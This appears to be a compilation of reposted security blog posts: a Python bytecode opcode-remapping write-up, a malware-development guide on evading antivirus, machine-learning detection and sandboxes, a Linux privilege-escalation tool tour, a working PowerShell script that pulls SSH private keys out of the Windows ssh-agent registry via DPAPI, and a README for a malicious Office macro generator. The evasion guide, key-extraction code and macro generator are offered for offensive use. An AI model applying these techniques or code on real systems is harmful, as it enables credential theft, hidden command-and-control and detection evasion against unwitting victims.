If we unpack this unsigned short, the magic number is 62211. We now know the .pyc was compiled by version 2.7. Let’s look at the timestamp now. It is 4 bytes long, starting at offset 4.

This makes sense because I created the .py file at 2:26 PM on April 30th.

And finally, the serialized code object remains to be read. It can be deserialized with the marshal module, and the object is executable. Hello world!
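Putting those pieces together, here is a small Python 2.7 sketch that parses hello.pyc as described above and then disassembles and runs the recovered code object:

import dis
import marshal
import struct
import time

with open('hello.pyc', 'rb') as f:
    data = f.read()

magic = struct.unpack('<H', data[0:2])[0]        # 62211 for CPython 2.7
timestamp = struct.unpack('<I', data[4:8])[0]    # the .py's st_mtime
code_obj = marshal.loads(data[8:])               # the serialized code object

print(magic)
print(time.ctime(timestamp))
dis.dis(code_obj)   # disassemble it...
exec(code_obj)      # ...or just run it: Hello world!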

Let’s frame up the problem to be solved. The main goal is to decompile a .pyc file, and fix its opcodes. During decompilation, an intermediate step is to disassemble the .pyc code objects into opcodes.

Disassembling Code Objects

Let’s use the dis module to disassemble the code object in hello.pyc.

All of these instructions are required to print ‘Hello world!’. In the first instruction, we can see “0 LOAD_CONST 0 (‘Hello world!’)”. “0 LOAD_CONST” means a LOAD_CONST operation starts at offset 0 in the bytecode. And “0 (‘Hello world!’)” means that the constant at index 0 is loaded (the string is just shown in the disassembly output for clarity). Technically speaking, LOAD_CONST pushes a constant onto the stack.

Looking at the code object, the bytecode (co_code) and constants (co_consts) are accessible (and variables, etc).

Here is the raw bytecode:

Here the opcode at offset 0 is ‘d’, which is actually decimal 100 in ASCII. This can be looked up in the opname sequence.

The next two bytes, “\x00\x00” represent the index of the ‘Hello world!’ constant (operand).

We’ve now established that code objects can be disassembled with the dis module. The disassembly displays instructions consisting of operation names and operands. We can also inspect the raw bytecode (co_code) and constants (co_consts) stored in code objects (other stuff as well). It gets tricky when code objects contain nested code objects.

Since we have the opcode mappings for both Druva and the normal Python 2.7, we can develop a basic strategy for opcode conversion. My strategy was to disassemble the code object in a .pyc file, convert each operation, and stuff all of this into a new code object. No need to remap operands. However, it’s just a bit more complicated than that. Let’s look at nested code objects.

Nested Code Objects

Most of the modules you encounter will be more complex than the hello world. They will contain functions and classes as well.

Here is a more advanced hello world example:

Breaking it down, we have a class named “HelloClass”. The class contains functions named “__init__” and “sayHello.” Let’s disassemble the code object after reading the .pyc.

Notice the LOAD_CONST instruction at offset 9. A HelloClass code object is loaded. This HelloClass code object is stored at index 1 in co_consts.

Let’s disassemble that too.

More code objects? Yep. The __init__ and sayHello functions are code objects as well. A code object can have many layers of nested code objects. This requires the opcode remapping algorithm to be recursive!

The Algorithm

For reference, here are the opcode mappings again:

Druva opcode mapping
Normal Python 2.7 opcode mapping

Here’s my general algorithm.

Starting with the outer code object in the .pyc file (code_obj_in), convert all of the opcodes using the mappings above and store into new_co_code. For example, if a CALL_FUNCTION is encountered, the opcode will be converted from 111 to 131. We will then inspect the co_consts sequence and recursively remap any code objects found in there. new_co_consts will be added into the output code object.
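Here is a condensed sketch of that recursion (Python 2.7). It is not the exact script from the post: druva_to_normal is assumed to be a dict built from the two opcode maps above, and EXTENDED_ARG handling is omitted for brevity.

import types

HAVE_ARGUMENT = 90  # in the standard 2.7 mapping, opcodes >= 90 take a 2-byte operand

def remap_code_object(code_obj_in, druva_to_normal):
    # Convert the bytecode one instruction at a time.
    old = bytearray(code_obj_in.co_code)
    new = bytearray()
    i = 0
    while i < len(old):
        op = druva_to_normal[old[i]]
        new.append(op)
        i += 1
        if op >= HAVE_ARGUMENT:      # copy the 2-byte operand untouched
            new += old[i:i + 2]
            i += 2

    # Recurse into nested code objects stored in co_consts.
    new_consts = tuple(
        remap_code_object(c, druva_to_normal) if isinstance(c, types.CodeType) else c
        for c in code_obj_in.co_consts)

    return types.CodeType(
        code_obj_in.co_argcount, code_obj_in.co_nlocals, code_obj_in.co_stacksize,
        code_obj_in.co_flags, bytes(new), new_consts, code_obj_in.co_names,
        code_obj_in.co_varnames, code_obj_in.co_filename, code_obj_in.co_name,
        code_obj_in.co_firstlineno, code_obj_in.co_lnotab,
        code_obj_in.co_freevars, code_obj_in.co_cellvars)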

When the new .pyc file is created (not shown), it will have a magic number of 62211, and all code objects will be populated with remapped opcodes. Let’s see the script in action.

Running the process converts a total of 1773 .pyc files. Notice I copied the Druva python27.dll into C:\Python27. Bytecode was disassembled using the Druva opcode mappings, and then converted.

Converting opcodes

And after conversion, we can successfully decompile the .pyc’s in the inSyncClient folder! Prior to opcode conversion, this was not possible.

Decompilation is successful

Closing Thoughts

I hope this serves as a useful introduction to how Python opcodes might be obfuscated. There are other tools (e.g. pyREtic) out there that do the same kind of remapping process we’ve discussed here. In fact, after writing this code, I found out that this logic had already been implemented specifically for Druva inSync in the dedrop repository.

I’m sure there are more elegant approaches to opcode conversion, but the script definitely got the job done. If you’re interested in checking out the full source code, I’ve dropped it on our GitHub. Thanks for reading, and check out the Tenable TechBlog for more technical blogs and vulnerability write-ups. Give me a shout on Twitter as well!

-Chris Lyne (@lynerc)

Malware on Steroids Part 3: Machine Learning & Sandbox Evasion

 

( Original text by Paranoid Ninja )

It’s been a busy month for me and I was not able to find time to write the final part of the series on malware development. But I have been receiving a lot of DMs on Twitter lately asking me to publish the final part. So here we are.

If you are reading this blog, I am basically assuming that you know C/C++ and Windows API by now. If you don’t, then you should go back and read my other blogs on Static AV Evasion and Malware Development using WINAPI (basics).

In this post, we will be using multiple ways to evade endpoint detection mechanisms and sandboxes. Machine learning is applied at two major levels in most organizations. One is at the network level, where it tries to identify anomalies based on the behavior of network connections, proxy logs and patterns of connections over time. Most network ML solutions tend to analyze malware beacons and use DPI (deep packet inspection) to identify the malware. This is something that Microsoft ATA (Advanced Threat Analytics) or FireEye sandboxes do. On the other hand, we have endpoint agents like Symantec EP, CrowdStrike, Endgame, Microsoft Cloud Defender and similar monitoring tools which perform behavioral analysis of the code along with signature detection to detect malicious processes.

I will purely be focusing on multiple ways we can make our malware behave like a legitimate executable or confuse the endpoint agent to evade detection. I’ve used the methods mentioned in this blog to successfully evade the CrowdStrike agent, Symantec EP and Microsoft Windows Cloud Defender; videos of the latter I have already posted in my previous blogs. However, you might need to modify or add new techniques, as these might become detectable over time. One of the best ways to avoid AV is to disable process creation altogether and just use WINAPI. But that would mean carefully crafting your payloads, and it would be difficult to port them for shellcoding. That’s the main reason malware authors write their malware in C, and only selected payloads in shellcode. A combination of these two makes malware unbeatable on all fronts.

Each of the techniques mentioned below creates a unique signature which most AVs won’t have. It’s more trial and error to check which AVs detect which techniques. Also remember that we can use stubs and packers for encryption, but that’s for a different blog post that I will do later.

P.S.: This blog excludes shellcode, the reason being that I will be writing a separate blog series on Windows shellcoding later. I will be using encrypted functions during the shellcoding part and not in this post. This post is specifically about how malware authors use C to perform evasions. You can also use the same APIs and code snippets mentioned below to craft a custom malware for red teaming.

main():

So, before we start, let’s try to get a basic understanding of how machine learning works. Machine learning is purely focused on the behaviour of the user (in the case of endpoints). In short, if we sign our malware and try to make it act like a legitimate executable, it becomes really easy to evade ML. I’ve seen people using PowerShell to write reverse shells, but they get easily detected due to Microsoft’s AMSI (Anti-Malware Scan Interface), which consistently keeps checking (including, and mainly, PowerShell) to detect malicious process executions and connections. For those of you who don’t know, Microsoft uses the DMTK (Microsoft Distributed Machine Learning Toolkit) framework, which is basically a decision-tree-based algorithm that specifies whether a file is malicious or not. PowerShell is very tightly controlled by Microsoft and it gets harder over time to evade ML when using PowerShell.

This is the reason I decided to switch to C and C++ to get reverse shells over the network, so that I could have flexibility at a lower level to do whatever I want. We will be using a lot of Windows APIs, encrypted variables and a lot of decision trees of our own to evade ML. This is supposed to work until Microsoft starts using the CNTK framework, which is a much better framework than DMTK, but harder to apply at the same time.

Encrypted Host & Process Names

So, the first thing to do is to encrypt our hostname. We can possibly use something as simple as XOR, or any custom complicated mathematical equation, to decrypt our encrypted variable to get the hostname. I created a Python script which takes a hostname and a character and returns a XOR’d array:
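The original script is only shown as a screenshot in the source post; a minimal version of the idea could look like this (the key character and output format are illustrative):

import sys

def xor_encrypt(hostname, key_char):
    key = ord(key_char)
    encrypted = [ord(c) ^ key for c in hostname]
    # Print everything we need to paste into the C source: the XOR key as an
    # integer, the array length, and the encrypted values as a C-style array
    # with the key appended as the last element.
    print("Key: %d" % key)
    print("Length: %d" % len(encrypted))
    print("unsigned char EncryptedHost[] = { %s, %d };"
          % (", ".join(str(b) for b in encrypted), key))

if __name__ == "__main__":
    # e.g. python xor_host.py c2.example.com k
    xor_encrypt(sys.argv[1], sys.argv[2])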

As you can see, it gives the integer value of the XOR key, the length of the encrypted array and the whole encrypted array, which we can simply use in a C integer or char array.

The next step is to decrypt this array at runtime, and we need to hardcode the key inside the executable. This is the only key that we will be hardcoding into the code. Also, to make it complicated for the reverse engineer, we will write a C function that automatically detects that the last integer is the key and uses it to loop through the array and decrypt the encrypted string. Below is what it looks like:

So, we are creating a char buffer of the size of EncryptedHost on heap. We are then passing the host, length and decrypted host variable to the Decrypter function. Below is how the Decrypter function looks:

To explain in short, it creates an encrypted integer array from our char array and XORs it back again using the key, converting the encrypted values to the original ones and storing them in the DecryptedData array we created previously. With the help of this, if someone runs strings, they won’t be able to see any host in the executable. They would need to understand the math and set a proper breakpoint in a debugger to fetch the C2 host. You can create more complicated mathematical equations to decrypt the host if required. We can now use this DecryptedData array within our sockets to connect to the remote host.

P.S.: Reverse engineers & sandboxes can fetch the C2 names with the help of packet captures and DNS name resolutions. It is better to send raw packets to multiple hosts to confuse which one is the real C2 server. But at the same time, this can lead to easy detection of the malware. Check my Legitimate Domain Routing technique below, which is much better than using this.

If you’ve read my previous post, then you know that I created a cmd.exe process using the CreateProcessW WinAPI. We can do what we did above for creating processes as well. But instead of hardcoding the encrypted array for the process to be executed, we will send the process name as an array over the network once the executable connects to the C2 server, along with the host. We can also use authentication on the C2 server, and only allow it to connect if it sends a proper key. Below is the code for creating processes using an encrypted char array over sockets.

In this way, when a system sandboxes our executable, it won’t know beforehand what process we are executing inside the sandbox. Below is a much clearer description of what we are doing:

  1. Decrypt C2 host at runtime and connect to host
  2. Receive password and verify if it is right
  3. If the key is right, wait for 5 seconds to receive the encrypted array (process name) over the socket
  4. Decrypt the received Process and run it using CreateProcessW API

With the help of the above technique, if our C2 is down, then the sandbox/analyst will not be able to find what we are executing since we have not hardcoded any processes to execute.

Code Signing with Spoofed Certs

I wrote a script in Python which can fetch and create duplicate certificates from any website, which we can use for code signing. One thing I noticed is that antiviruses don’t check and verify the whole chain of the certificate. They don’t even verify its authenticity. The main reason is that not every antivirus can connect to the internet in every organization to fetch and verify the certificates of every third-party application installed. You can find the certificate spoofing Python script on my GitHub profile here.

And this is the scan results of Windows ML Defender after Signing:

Next, we will try to add a few features to our malware to detect if we are running in a sandbox or inside a virtual machine. We will try to evade sandboxes as much as possible and kill our executable as soon as we find anything suspicious. We need to make sure that our malware doesn’t even look suspicious, because if it does, the sandbox will quarantine it and send an alert that there is a suspicious process running. This is worse than detection, because this is where most SOCs detect the malware and the red teaming gets detected.

Legitimate Domain Routing (Evade Proxy Categorization Detection and Endpoint Detection)

This is one of the best techniques I’ve found to date, and it works almost every time. Let’s say I buy a C2 domain named abc.com. I will modify the A records so that they point to Microsoft.com or some similar legitimate site for a month or so. When the malware executes on the victim’s system, it will connect to this domain, which will send a normal HTTP reply from Microsoft, and the malware will go to sleep for a few hours and then loop into doing the same thing. Now, whenever I want to get a reverse shell from my malware, I will simply change the A records of abc.com to my C2 hosting server, and it will send a key over HTTP to the malware which will trigger it to fetch shellcode or send a shell back to my C2. This way, abc.com will also get categorized as a legitimate domain instead of a malicious or phishing site. And even the endpoint systems will not block it, since it is contacting a legitimate domain. Over time I’ve also used Symantec’s website to connect to as a temporary domain, later changing it to my malicious C2 server.

Check System Uptime & Idletime (Evades Virtual Machine Sandboxes)

If our executable is running in a virtual machine, the uptime will be pretty short, since it will boot up, perform analysis on our binary and then shut down. So, we can check the uptime of the machine and sleep until it reaches 20-30 minutes, and only then run. Make sure to use NTP to check the time against an external domain, otherwise sandboxes can fast-forward the system time for process executions. Checking via NTP makes sure that the correct time is checked. Below is the code to check the uptime of a system, and also the idle time in case it is required.

Idletime:

Uptime:
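The original listings are in C; purely as an illustration of the same two WinAPI checks (GetTickCount64 for uptime, GetLastInputInfo for idle time), a Python/ctypes sketch could look like this:

import ctypes

class LASTINPUTINFO(ctypes.Structure):
    _fields_ = [("cbSize", ctypes.c_uint), ("dwTime", ctypes.c_uint)]

kernel32 = ctypes.windll.kernel32
user32 = ctypes.windll.user32
kernel32.GetTickCount64.restype = ctypes.c_ulonglong

def uptime_minutes():
    # Milliseconds since boot.
    return kernel32.GetTickCount64() / 1000 / 60

def idle_minutes():
    # Time since the last keyboard/mouse input.
    info = LASTINPUTINFO()
    info.cbSize = ctypes.sizeof(LASTINPUTINFO)
    user32.GetLastInputInfo(ctypes.byref(info))
    return (kernel32.GetTickCount() - info.dwTime) / 1000 / 60

# e.g. sleep or exit if uptime_minutes() < 25 or idle_minutes() < 2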

Check Mac Address of Virtual Machine (Known OUIs)

VMware, VirtualBox, MS Hyper-V and a lot of other virtual machine providers use fixed MAC unique identifiers, which we can check in a loop to see whether the current MAC address matches any of those in the list. If it does, then it is highly possible that the malware is running in a virtual environment, mostly for the purpose of sandboxing and reverse engineering. Below are the OUIs that I know of for the moment. If there are more, do let me know in the comments.

Company and Products                                 MAC unique identifier(s)
VMware ESX 3, Server, Workstation, Player            00-50-56, 00-0C-29, 00-05-69
Microsoft Hyper-V, Virtual Server, Virtual PC        00-03-FF
Parallels Desktop, Workstation, Server, Virtuozzo    00-1C-42
Virtual Iron 4                                       00-0F-4B
Red Hat Xen                                          00-16-3E
Oracle VM                                            00-16-3E
XenSource                                            00-16-3E
Novell Xen                                           00-16-3E
Sun xVM VirtualBox                                   08-00-27

Below is the C code to detect mac address of a Windows machine:
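The C listing referenced above isn’t reproduced here; as a rough Python illustration of the same check (using the OUI list from the table above):

import uuid

VM_OUIS = {"00:50:56", "00:0C:29", "00:05:69", "00:03:FF", "00:1C:42",
           "00:0F:4B", "00:16:3E", "08:00:27"}

def looks_like_vm():
    mac = "%012X" % uuid.getnode()                   # local MAC as 12 hex digits
    oui = ":".join(mac[i:i + 2] for i in (0, 2, 4))  # first three octets
    return oui in VM_OUIS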

Execute shellcode when a specific key is pressed. (Sleep & hook method)

Here, we only execute our shellcode/malicious process when the user presses a specific key. For this, we can hook the keyboard and create a list of multiple keys that specify what kind of shellcode needs to be executed. This is basically polymorphism: every time, a different shellcode depending on the key will confuse the antivirus; and secondly, in a sandbox no one presses any keys, so our malware won’t execute there. Below is the code to hook the keyboard and check the key pressed.

P.S.: The code below can also be used for keylogging.

Check number of files in Temp and Recent Files

Whenever malware is running in a sandbox, the sandbox will have a minimal number of recent files in the virtual machine, the reason being that sandboxes are not used for everyday work. So, we can run a loop to check the number of recent files and also the files in the temp directory to check if we are running in a virtual machine. If the number of recent files is less than 10-15, just sleep or suspend execution. Below is a code I wrote which loops to check all files and folders in a directory:

Now, I could keep going like this, but the blog would just get lengthier. Besides, below are a few more things you can code to check if we are running in a sandbox:

  1. Check if the hard disk size is greater than 60 GB (Default Virtual Machine Sandbox Size is <100GB)
  2. Check if Packet Capture Driver is installed in the registry (To check if Wireshark or similar is running for packet analysis)
  3. Check if Virtual Box additions/extension pack is installed
  4. WannaCry DNS Sinkhole Method

This is another method, which WannaCry used. Basically, the malware will try to connect to a domain that doesn’t exist. If it gets a reply, it means the malware is running in a sandbox, since sandboxes will reply even to an NX domain to check whether that’s a C2 server. If we get an NX domain in reply, then we can directly connect to the C2 host. BEWARE that DNS sinkholes can prevent your malware from executing at all. Instead, you can buy a certain domain and check for a customized response to determine whether you are running in a sandbox environment.

Now, there are many more ways to evade ML and AV detection, and they aren’t really that hard. Evading ML-based AVs is not rocket science, as people say. It just requires more free time to sit down, understand how the underlying architecture works and find flaws to evade it.

It’s much better to invest in a highly technical threat hunter for detecting suspicious behaviors in your environment and logs rather than buying a high-end sandbox or antivirus solution, though the latter is also useful in its own sense.

 

Linux Privilege Escalation via Automated Script

( Original text by Raj Chandel )

We all know that, after compromising the victim’s machine, we have a low-privileged shell that we want to escalate into a higher-privileged shell; this process is known as privilege escalation. Today in this article we will discuss what comes under privilege escalation and how an attacker can identify whether a low-privileged shell can be escalated to a higher-privileged one. Apart from that, there are some scripts for Linux that may come in useful when trying to escalate privileges on a target system. They are generally aimed at enumeration rather than specific vulnerabilities/exploits. This type of script could save you a lot of time.

Table of Content

  • Introduction
  • Vectors of Privilege Escalation
  • LinEnum
  • Linuxprivchecker
  • Linux Exploit Suggester 2
  • Bashark
  • BeRoot

Introduction

Basically, privilege escalation is a phase that comes after the attacker has compromised the victim’s machine, where they try to gather critical information related to the system, such as hidden passwords and weakly configured services or applications. All this information helps the attacker perform post-exploitation against the machine to get a higher-privileged shell.

Vectors of Privilege Escalation

  • OS Detail & Kernel Version
  • Any Vulnerable package installed or running
  • Files and Folders with Full Control or Modify Access
  • File with SUID Permissions
  • Mapped Drives (NFS)
  • Potentially Interesting Files
  • Environment Variable Path
  • Network Information (interfaces, arp, netstat)
  • Running Processes
  • Cronjobs
  • User’s Sudo Right
  • Wildcard Injection

There are several scripts used in penetration testing to quickly identify potential privilege escalation vectors on Linux systems, and today we are going to walk through each script that works smoothly.
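To make the idea concrete, the sketch below (my own illustration in Python, not one of the tools that follow) shows the kind of checks these scripts automate by listing SUID binaries and dumping the current user's sudo rights:

import os
import stat
import subprocess

def find_suid(root="/usr/bin"):
    # Walk a directory tree and collect files with the SUID bit set.
    suid = []
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                mode = os.stat(path).st_mode
            except OSError:
                continue
            if mode & stat.S_ISUID:
                suid.append(path)
    return suid

print("SUID binaries under /usr/bin:")
for path in find_suid():
    print("  ", path)

print("sudo rights for the current user:")
# 'sudo -n -l' fails instead of prompting when a password would be required.
result = subprocess.run(["sudo", "-n", "-l"], capture_output=True, text=True)
print(result.stdout or result.stderr)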

LinEnum

LinEnum is a shell script for scripted local Linux enumeration and privilege escalation checks. It enumerates the system configuration and provides a high-level summary of the checks/tasks it performs:

Privileged access: Diagnoses whether the current user has sudo access without a password, and whether root's home directory is accessible.

System Information: Hostname, Networking details, Current IP, etc.

User Information: Current user, List all users including uid/gid information, List root accounts, Checks if password hashes are stored in /etc/passwd.

Kernel and distribution release details.

You can download it from GitHub with the help of the following command:

Once you have downloaded the script, you can simply run it by typing ./LinEnum.sh in the terminal. It will then dump all the fetched data and system details.

Let's analyse the results it brings back:

OS & Kernel Info: 4.15.0-36-generic, Ubuntu-16.04.1

Hostname: Ubuntu

Moreover…..

Super User Accounts: root, demo, hack, raaz

Sudo Rights User: Ignite, raj

Home Directories File Permission

Environment Information

And many more details that come under post-exploitation.

Linuxprivchecker

Linuxprivchecker enumerates the system configuration and runs some privilege escalation checks as well. It is a Python implementation that suggests exploits specific to the system that has been compromised. Use wget to download the script from its source URL.

To use this script, just type python linuxprivchecker.py in the terminal and it will enumerate file and directory permissions and contents. This script works the same way as LinEnum and hunts for details about the system, network and users.

Let's analyse the results it brings back.

OS & Kernel Info: 4.15.0-36-generic, Ubuntu-16.04.1

Hostname: Ubuntu

Network Info: Interface, Netstat

Writable Directory and Files for Users other than Root: /home/raj/script/shell.py

Checks if Root’s home folder is accessible

Files having SUID/SGID permissions

For example: /bin/raj/asroot.sh, which is a bash script with the SUID permission set.

Linux Exploit Suggester 2

Next-generation exploit suggester based on Linux_Exploit_Suggester. This program performs a ‘uname -r‘ to grab the Linux operating system release version, and returns a list of possible exploits.
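The core idea can be sketched in a few lines of Python; the two entries below are illustrative only and not the tool's actual exploit database:

import platform

release = platform.release()                       # e.g. '4.15.0-36-generic'
major_minor = tuple(int(x) for x in release.split("-")[0].split(".")[:2])

# Illustrative entries only; the real tool ships a much larger, curated list.
candidates = {
    "Dirty COW (CVE-2016-5195)": major_minor < (4, 9),
    "overlayfs (CVE-2015-1328)": major_minor < (4, 0),
}

print("Kernel release:", release)
for name, maybe_vulnerable in candidates.items():
    if maybe_vulnerable:
        print("Possibly vulnerable to:", name)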

This script is extremely useful for quickly finding privilege escalation vulnerabilities both in on-site and exam environments.

Key Improvements Include:

  • More exploits
  • Accurate wildcard matching. This expands the scope of searchable exploits.
  • Output colorization for easy viewing.
  • And more to come

You can use the ‘-k’ flag to manually enter a wildcard for the kernel/operating system release version.

Bashark

Bashark aids pentesters and security researchers during the post-exploitation phase of security audits.

Its Features

  • Single Bash script
  • Lightweight and fast
  • Multi-platform: Unix, OSX, Solaris etc.
  • No external dependencies
  • Immune to heuristic and behavioural analysis
  • Built-in aliases of often used shell commands
  • Extends system shell with post-exploitation oriented functionalities
  • Stealthy, with custom cleanup routine activated on exit
  • Easily extensible (add new commands by creating Bash functions)
  • Full tab completion

Execute the following command to download it from GitHub:

 

To execute the script you need to run the following command:

The help command will show you all the options bashark provides for post-exploitation.

With the help of the portscan option you can scan the internal network of the compromised machine.

To fetch all configuration files you can use the getconf option; it will pull out every configuration file stored inside the /etc directory. Similarly, you can use the getprem option to view all binary files on the target's machine.

BeRoot

The BeRoot Project is a post-exploitation tool that checks common misconfigurations to find a way to escalate our privileges. The tool does not perform any exploitation itself. Its main goal is not to carry out a full configuration assessment of the host (listing all services, processes, network connections, etc.) but to print only the information that has been identified as a potential way to escalate our privileges.

 

To execute the script you need to run the following command:

It will try to enumerate all possible loopholes that can lead to privilege escalation. As you can observe, the text highlighted in yellow represents a weak configuration that can lead to root privilege escalation, whereas the red text represents the technique that can be used to exploit it.

Its functions:

  • Check file permissions
  • SUID binaries
  • NFS root squashing
  • Docker
  • Sudo rules
  • Kernel exploits

Conclusion: all of the scripts executed above are available on GitHub and easy to download. Each of these automated scripts tries to identify weak configurations that can lead to root privilege escalation.

Author: Aarti Singh is a researcher and technical writer at Hacking Articles, an information security consultant, social media lover and gadgets enthusiast. Contact here.

Extracting SSH Private Keys from Windows 10 ssh-agent

Intro

This weekend I installed the Windows 10 Spring Update, and was pretty excited to start playing with the new, built-in OpenSSH tools.

Using OpenSSH natively in Windows is awesome since Windows admins no longer need to use Putty and PPK formatted keys. I started poking around and reading up more on what features were supported, and was pleasantly surprised to see ssh-agent.exe is included.

I found some references to using the new Windows ssh-agent in this MSDN article, and this part immediately grabbed my attention:

Securely store private keys

I’ve had some good fun in the past with hijacking SSH-agents, so I decided to start looking to see how Windows is «securely» storing your private keys with this new service.

I’ll outline in this post my methodology and steps to figuring it out. This was a fun investigative journey and I got better at working with PowerShell.

tl;dr

Private keys are protected with DPAPI and stored in the HKCU registry hive. I released some PoC code here to extract and reconstruct the RSA private key from the registry

Using OpenSSH in Windows 10

The first thing I tested was using the OpenSSH utilities normally to generate a few key-pairs and adding them to the ssh-agent.

First, I generated some password protected test key-pairs using ssh-keygen.exe:

Powershell ssh-keygen

Then I made sure the new ssh-agent service was running, and added the private key pairs to the running agent using ssh-add:

Powershell ssh-add

Running ssh-add.exe -L shows the keys currently managed by the SSH agent.

Finally, after adding the public keys to an Ubuntu box, I verified that I could SSH in from Windows 10 without needing to decrypt my private keys (since ssh-agent takes care of that for me):

Powershell SSH to Ubuntu

Monitoring SSH Agent

To figure out how the SSH Agent was storing and reading my private keys, I poked around a little and started by statically examining ssh-agent.exe. My static analysis skills proved very weak, however, so I gave up and just decided to dynamically trace the process and see what it was doing.

I used procmon.exe from Sysinternals and added a filter for any process name containing «ssh».

With procmon capturing events, I then SSH’d into my Ubuntu machine again. Looking through all the events, I saw ssh.exe open a TCP connection to Ubuntu, and then finally saw ssh-agent.exe kick into action and read some values from the Registry:

SSH Procmon

Two things jumped out at me:

  • The process ssh-agent.exe reads values from HKCU\Software\OpenSSH\Agent\Keys
  • After reading those values, it immediately opens dpapi.dll

Just from this, I now knew that some sort of protected data was being stored in and read from the Registry, and ssh-agent was using Microsoft’s Data Protection API

Testing Registry Values

Sure enough, looking in the Registry, I could see two entries for the keys I added using ssh-add. The key names were the fingerprint of the public key, and a few binary blobs were present:

Registry SSH Entries

Registry SSH Values

After reading StackOverflow for an hour to remind myself of PowerShell’s ugly syntax (as is tradition), I was able to pull the registry values and manipulate them. The «comment» field was just ASCII encoded text and was the name of the key I added:

Powershell Reg Comment

The (default) value was just a byte array that didn’t decode to anything meaningful. I had a hunch this was the «encrypted» private key if I could just pull it and figure out how to decrypt it. I pulled the bytes to a Powershell variable:

Powershell keybytes

Unprotecting the Key

I wasn’t very familiar with DPAPI, although I knew a lot of post exploitation tools abused it to pull out secrets and credentials, so I knew other people had probably implemented a wrapper. A little Googling found me a simple oneliner by atifaziz that was way simpler than I imagined (okay, I guess I see why people like Powershell…. 😉 )

Add-Type -AssemblyName System.Security;
[Text.Encoding]::ASCII.GetString([Security.Cryptography.ProtectedData]::Unprotect([Convert]::FromBase64String((type -raw (Join-Path $env:USERPROFILE foobar))), $null, 'CurrentUser'))

I still had no idea whether this would work or not, but I tried to unprotect the byte array using DPAPI. I was hoping maybe a perfectly formed OpenSSH private key would just come back, so I base64 encoded the result:

Add-Type -AssemblyName System.Security  
$unprotectedbytes = [Security.Cryptography.ProtectedData]::Unprotect($keybytes, $null, 'CurrentUser')

[System.Convert]::ToBase64String($unprotectedbytes)

The Base64 returned didn’t look like a private key, but I decoded it anyway just for fun and was very pleasantly surprised to see the string «ssh-rsa» in there! I had to be on the right track.

Base 64 decoded

Figuring out Binary Format

This part actually took me the longest. I knew I had some sort of binary representation of a key, but I could not figure out the format or how to use it.

I messed around generating various RSA keys with openssl, puttygen and ssh-keygen, but never got anything close to resembling the binary I had.

Finally after much Googling, I found an awesome blogpost from NetSPI about pulling out OpenSSH private keys from memory dumps of ssh-agent on Linux: https://blog.netspi.com/stealing-unencrypted-ssh-agent-keys-from-memory/

Could it be that the binary format is the same? I pulled down the Python script linked from the blog and fed it the unprotected base64 blob I got from the Windows registry:

parse_mem.py

It worked! I have no idea how the original author soleblaze figured out the correct format of the binary data, but I am so thankful he did and shared. All credit due to him for the awesome Python tool and blogpost.

Putting it all together

After I had proved to myself it was possible to extract a private key from the registry, I put it all together in two scripts.

GitHub Repo

The first is a Powershell script (extract_ssh_keys.ps1) which queries the Registry for any saved keys in ssh-agent. It then uses DPAPI with the current user context to unprotect the binary and save it in Base64. Since I didn’t even know how to start parsing Binary data in Powershell, I just saved all the keys to a JSON file that I could then import in Python. The Powershell script is only a few lines:

$path = "HKCU:\Software\OpenSSH\Agent\Keys\"

$regkeys = Get-ChildItem $path | Get-ItemProperty

if ($regkeys.Length -eq 0) {  
    Write-Host "No keys in registry"
    exit
}

$keys = @()

Add-Type -AssemblyName System.Security;

$regkeys | ForEach-Object {
    $key = @{}
    $comment = [System.Text.Encoding]::ASCII.GetString($_.comment)
    Write-Host "Pulling key: " $comment
    $encdata = $_.'(default)'
    $decdata = [Security.Cryptography.ProtectedData]::Unprotect($encdata, $null, 'CurrentUser')
    $b64key = [System.Convert]::ToBase64String($decdata)
    $key[$comment] = $b64key
    $keys += $key
}

ConvertTo-Json -InputObject $keys | Out-File -FilePath './extracted_keyblobs.json' -Encoding ascii  
Write-Host "extracted_keyblobs.json written. Use Python script to reconstruct private keys: python extractPrivateKeys.py extracted_keyblobs.json"  

I heavily borrowed the code from parse_mem_python.py by soleblaze and updated it to use Python3 for the next script: extractPrivateKeys.py. Feeding the JSON generated from the Powershell script will output all the RSA private keys found:

Extracting private keys

These RSA private keys are unencrypted. Even though I set a password when I created them, ssh-agent stores them unencrypted, so the password is no longer needed.

To verify, I copied the key to a Kali Linux box, checked the fingerprint and used it to SSH in!

Using the key

Next Steps

Obviously my PowerShell-fu is weak and the code I’m releasing is more for PoC. It’s probably possible to re-create the private keys entirely in PowerShell. I’m also not taking credit for the Python code — that should all go to soleblaze for his original implementation.

Malicious Macro Generator Utility

A simple utility designed to generate obfuscated macros that also include an AV/sandbox escape mechanism.


Requirement

Python 2.7

Usage

MMG.Malicious Macro Generator v2.0 - RingZer0 Team
Author: Mr.Un1k0d3r

Usage: MMG.py [config] [output] (optional -list)

        config  Config file that contain generator information
        output  Output filename for the macro
        -list   List all available payloads and evasion techniques

python MMG.py configs/generic-cmd.json malicious.vba

Config file

Example of a project config file.

{
	"description": "Generic command exec payload\nEvasion technique set to domain check",
	"template": "templates/payloads/generic-cmd-evasion-template.vba",
	"varcount": 150,
	"encodingoffset": 4,
	"chunksize": 200,
	"encodedvars": 	{
				"DOMAIN":"RINGZER0"
			},
	"vars": 	[],
	"evasion": 	["encoder", "domain"],
	"payload": "cmd.exe /c whoami"
}

Evasion techniques

Domain check

The macro fetches the USERDOMAIN environment variable and compares its value with a predefined one. If they match, the final payload is executed.
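The generated macro itself is VBA, but the check boils down to something like the following Python illustration (the expected value comes from the config's encodedvars):

import os

# If the workstation is not joined to the expected domain, assume an analysis
# environment and bail out without touching the payload.
if os.environ.get("USERDOMAIN", "") != "RINGZER0":
    raise SystemExit(0)
# ...otherwise decode and run the configured payload (e.g. cmd.exe /c whoami).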

Disk check

The macro looks at the total disk space. VMs and test machines use small disks most of the time.

Memory check

The macro looks at the total memory size. VMs and test machines are usually given fewer resources.

Uptime check

The macro looks at the system uptime. Sandboxes will return a short uptime.

Process check

The macro checks whether a specific process is running (for example, outlook.exe).

Obfuscation

The Python script will also generate obfuscated code to avoid heuristic detection.
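As a rough illustration of the approach (my own sketch, not MMG's actual encoder), shifting each character by the configured encodingoffset and splitting the result into chunksize-sized pieces keeps the payload out of the macro in clear text:

def encode(payload, offset=4, chunksize=200):
    # Shift every character by a fixed offset and split into fixed-size chunks.
    shifted = "".join(chr(ord(c) + offset) for c in payload)
    return [shifted[i:i + chunksize] for i in range(0, len(shifted), chunksize)]

def decode(chunks, offset=4):
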